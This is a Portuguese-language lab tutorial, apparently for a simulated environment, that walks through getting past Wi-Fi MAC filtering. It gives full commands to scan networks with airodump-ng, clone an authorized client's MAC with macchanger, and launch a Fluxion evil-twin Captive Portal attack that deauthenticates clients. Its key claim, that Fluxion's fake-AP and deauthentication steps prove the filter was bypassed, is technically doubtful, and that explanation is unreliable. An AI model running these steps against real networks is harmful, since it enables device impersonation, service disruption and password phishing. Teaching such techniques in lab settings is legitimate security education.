Introdução
O filtragem de endereços MAC (Media Access Control) é uma medida de segurança de rede onde um roteador ou ponto de acesso (AP) é configurado para aceitar tráfego apenas de dispositivos com endereços MAC específicos e pré-aprovados. Embora possa dissuadir intrusos casuais, esta camada de segurança pode ser contornada através de uma técnica chamada MAC spoofing.
Neste laboratório, você aprenderá o processo completo de contornar a filtragem de endereços MAC. Primeiro, você identificará uma rede alvo, encontrará o endereço MAC de um cliente já autorizado e, em seguida, alterará o endereço MAC do seu próprio adaptador sem fio para se passar por esse cliente. Finalmente, você verá como isso permite que uma ferramenta como o Fluxion inicie com sucesso um ataque que, de outra forma, seria bloqueado. Este laboratório tem fins educacionais para ajudá-lo a entender as vulnerabilidades de rede.
Identificar uma Rede Potencialmente Usando Filtragem MAC
Nesta etapa, você instalará as ferramentas necessárias e fará uma varredura de redes sem fio próximas. A primeira parte de qualquer avaliação sem fio é a reconhecimento. Precisamos ver quais redes estão disponíveis e escolher um alvo.
Primeiro, vamos atualizar a lista de pacotes e instalar o conjunto aircrack-ng, que contém as ferramentas que precisamos para a varredura.
sudo apt-get update
sudo apt-get install -y aircrack-ng
Em seguida, você precisa colocar seu adaptador sem fio em "modo monitor". Este modo permite que o adaptador capture todo o tráfego Wi-Fi no ar, não apenas o tráfego destinado a ele. Neste ambiente simulado, seu adaptador sem fio é nomeado wlan0.
Execute o seguinte comando para iniciar o modo monitor:
sudo airmon-ng start wlan0
Você deverá ver uma saída indicando que o modo monitor foi ativado. O comando também criará uma nova interface virtual, tipicamente nomeada wlan0mon.
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wireless
(monitor mode enabled on wlan0mon)
Agora, use airodump-ng com a nova interface monitor (wlan0mon) para escanear todas as redes sem fio ao alcance.
sudo airodump-ng wlan0mon
Deixe a varredura rodar por um minuto. Você verá uma lista de pontos de acesso detectados. Para este laboratório, assumiremos que nossa rede alvo tem o ESSID (nome da rede) "Target-Net". Pressione Ctrl+C para parar a varredura assim que a vir.
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -30 10 0 0 6 54e WPA2 CCMP PSK Target-Net
F8:E4:3B:9A:1B:C0 -65 8 0 0 1 54e WPA2 CCMP PSK Other-Net
Desta saída, anote o BSSID (00:11:22:33:44:55) e o CH (canal 6) da nossa "Target-Net". Precisaremos dessas informações na próxima etapa.
Usar 'airodump-ng' para Encontrar o Endereço MAC de um Cliente Conectado
Nesta etapa, você focará sua varredura na rede alvo para identificar quaisquer clientes que já estejam conectados. Para contornar a filtragem MAC, você precisa se passar por um dispositivo que já está na "lista de permissões". Encontrar o endereço MAC de um cliente conectado é a chave para isso.
Usando o BSSID e o channel que você identificou na etapa anterior, execute airodump-ng novamente. Desta vez, você adicionará opções para filtrar a varredura e mostrar apenas informações sobre nossa rede alvo. Isso torna a saída mais limpa e ajuda você a encontrar clientes com mais facilidade.
Substitua 00:11:22:33:44:55 pelo BSSID da sua rede alvo e 6 pelo seu canal.
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 wlan0mon
A saída será dividida em duas partes. A parte superior mostra informações sobre o Ponto de Acesso (AP), e a parte inferior mostra os clientes conectados (estações).
CH 6 ][ Elapsed: 25 s ][ 2023-10-27 10:32
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -32 100 30 20 1 6 54e WPA2 CCMP PSK Target-Net
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -40 1- 0 0 15
Olhe para a seção inferior sob STATION. Este é o endereço MAC de um cliente conectado ao AP "Target-Net". Neste exemplo, o endereço MAC do cliente é AA:BB:CC:DD:EE:FF.
Copie este endereço MAC STATION. Você o usará na próxima etapa para falsificar seu próprio endereço MAC. Assim que tiver o endereço, você pode parar a varredura pressionando Ctrl+C.
Usar 'macchanger' para Falsificar o MAC do Seu Adaptador para o MAC do Cliente
Nesta etapa, você alterará o endereço MAC do seu adaptador sem fio para o que você capturou do cliente legítimo. Este processo é chamado de falsificação de MAC (MAC spoofing).
Primeiro, você precisa instalar o macchanger, uma utilidade simples para visualizar e manipular endereços MAC.
sudo apt-get install -y macchanger
Antes de alterar o endereço MAC, você deve parar a interface em modo monitor e desativar a interface sem fio física.
sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down
Agora, use macchanger para definir o novo endereço MAC. Use a opção -m seguida pelo endereço MAC do cliente que você anotou na etapa anterior (AA:BB:CC:DD:EE:FF).
sudo macchanger -m AA:BB:CC:DD:EE:FF wlan0
A saída mostrará o MAC original (Permanent) e confirmará o novo MAC falsificado.
Current MAC: 00:0c:29:12:34:56 (unknown)
Permanent MAC: 00:0c:29:12:34:56 (unknown)
New MAC: AA:BB:CC:DD:EE:FF (unknown)
Finalmente, ative a interface sem fio para que as alterações entrem em vigor.
sudo ifconfig wlan0 up
Você pode verificar se o endereço MAC foi alterado executando ifconfig wlan0 e verificando o campo ether. Seu adaptador agora está se passando pelo cliente legítimo.
Lançar o Ataque Fluxion com o Endereço MAC Falsificado
Nesta etapa, você lançará uma ferramenta de ataque chamada Fluxion. O objetivo é demonstrar que, com seu endereço MAC falsificado, a ferramenta pode se associar com sucesso ao AP alvo, um passo que falharia se a rede estivesse usando filtragem MAC e você tivesse um MAC aleatório e não autorizado.
Primeiro, você precisa baixar o Fluxion de seu repositório oficial no GitHub.
git clone https://www.github.com/FluxionNetwork/fluxion.git
Navegue para o diretório fluxion recém-criado.
cd fluxion
Agora, inicie o script Fluxion com privilégios de sudo.
sudo ./fluxion.sh
Fluxion é um script interativo. Você será solicitado a fazer várias seleções. Siga estas instruções:
- Seleção de Idioma: Pressione
Enterpara selecionar Inglês (ou digite o número correspondente). - Seleção do Adaptador Sem Fio: Fluxion detectará seu adaptador
wlan0. Selecione-o digitando seu número e pressionandoEnter. - Seleção de Canal: Escolha a opção para escanear redes (por exemplo, "All channels scanner").
- Seleção do Alvo: Após a varredura, uma lista de redes aparecerá. Encontre "Target-Net" e digite seu número, depois pressione
Enter. - Seleção do Ataque: Escolha um ataque. Para esta demonstração, selecione o ataque
Captive Portal. - Verificação do Handshake: Fluxion verificará um arquivo de handshake válido. Escolha a opção para pular ou realizar um ataque de desautenticação para capturar um.
A parte crítica desta etapa é observar que o Fluxion pode prosseguir por essas fases iniciais. Como seu endereço MAC agora está na "lista de permissões" do AP, as tentativas do Fluxion de se comunicar e associar ao AP serão bem-sucedidas.
Verificar se o Ataque Prossegue Após a Etapa de Associação
Nesta etapa final, você observará a saída do Fluxion para confirmar que a falsificação de MAC foi bem-sucedida. Você não precisa concluir o ataque completo; o objetivo é simplesmente verificar se você contornou a verificação de segurança inicial.
Após selecionar o ataque Captive Portal no Fluxion, a ferramenta iniciará seu processo. Você deverá ver mensagens no terminal indicando que ele está:
- Criando um Ponto de Acesso (AP) falso.
- Tentando desautenticar clientes do AP real.
- Aguardando um cliente se conectar ao AP falso.
A observação chave aqui é a ausência de um erro "falha na associação" (association failed). Se você tivesse tentado executar este ataque sem falsificar seu endereço MAC, o Fluxion provavelmente falharia logo no início porque o AP alvo rejeitaria quaisquer tentativas de conexão do seu endereço MAC não autorizado. O fato de o ataque prosseguir para a etapa de configuração de um AP falso e desautenticação de clientes é a prova de que você contornou com sucesso o filtro MAC.
Assim que você vir essas mensagens e confirmar que o ataque está prosseguindo, você pode parar o script com segurança pressionando Ctrl+C no terminal.
Como uma boa prática final, você deve sempre restaurar o endereço MAC original do seu adaptador após terminar.
Primeiro, desative a interface:
sudo ifconfig wlan0 down
Use macchanger com a opção -p (permanent) para restaurar o endereço MAC original de hardware.
sudo macchanger -p wlan0
Finalmente, ative a interface novamente.
sudo ifconfig wlan0 up
Você agora demonstrou com sucesso como contornar a filtragem MAC e realizou a limpeza restaurando sua configuração original.
Resumo
Neste laboratório, você aprendeu e executou com sucesso a técnica de contornar a filtragem de endereços MAC em uma rede Wi-Fi.
Você começou usando o conjunto aircrack-ng para escanear redes e identificar um alvo. Em seguida, focou nesse alvo com airodump-ng para encontrar o endereço MAC de um cliente já autorizado. Usando macchanger, você falsificou o endereço MAC do seu adaptador sem fio para se passar por esse cliente. Finalmente, você lançou a ferramenta Fluxion e verificou que o ataque poderia prosseguir além da etapa inicial de associação, provando que a medida de segurança de filtragem MAC havia sido efetivamente contornada.
Esta experiência prática demonstra uma vulnerabilidade comum em segurança de rede e destaca a importância de usar medidas de segurança mais fortes, como WPA2/WPA3 com uma senha forte, em vez de depender de identificadores facilmente falsificáveis como endereços MAC.
